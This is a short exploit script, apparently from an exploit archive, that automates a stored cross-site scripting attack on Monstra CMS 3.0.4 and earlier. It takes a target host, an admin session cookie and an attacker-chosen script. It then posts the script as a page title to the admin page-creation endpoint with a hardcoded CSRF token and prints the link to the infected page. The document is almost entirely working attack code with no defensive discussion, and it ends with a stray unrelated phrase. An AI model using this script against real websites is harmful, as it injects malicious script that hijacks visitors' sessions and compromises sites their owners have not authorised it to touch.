# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting # Date: 2018-06-07 # Author: DEEPIN2 # Software: Monstra CMS # Version: 3.0.4 and earlier # This automation code requires Python3 # You must intercept the first request through the proxy tool to verify the CSRF token. import requests import re def runXSS(target, cookie, data): exploit = requests.post(target, cookies=cookie, data=data).text if re.search('exploit', exploit): return 'OK' else: return 'ERROR' if __name__ == '__main__': print('''______ _______ ____ ____________ ____ / ___\ \ / / ____| |___ \ / _ \/ |( _ )/ |/ _ \/ / |( _ ) | |\ \ / /|_| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ ` | |___\ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) | \____|\_/|_____| |_____|\___/|_|\___/|_|\___/|_|_|\___/ [*] Author : DEEPIN2(Junseo Lee) ---------------------------------------------------------------------''') print('[*] Ex) http://www.target.com -> www.target.com') url = input('Target : ') print('[*] Required admin\'s PHPSESSID.') PHPSESSID = input('PHPSESSID : ') pagename = input('Pagename : ') script = input('Script : ') target = 'http://' + url + '/admin/index.php?id=pages&action=add_page' cookie = {'PHPSESSID':PHPSESSID} data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\ 'page_title':script,\ 'page_name':pagename,\ 'page_meta_title':'',\ 'page_keywords':'',\ 'page_description':'',\ 'pages':0,\ 'templates':'index',\ 'status':'published',\ 'access':'public',\ 'editor':'',\ 'page_tags':'',\ 'add_page_and_exit':'Save+and+Exit',\ 'page_date':'9999-99-99'} result = runXSS(target, cookie, data) print('-' * 69) if result == 'OK': print('[+] LINK : http://' + url + '/' + pagename) else: print('[-] Error')
体验盒子
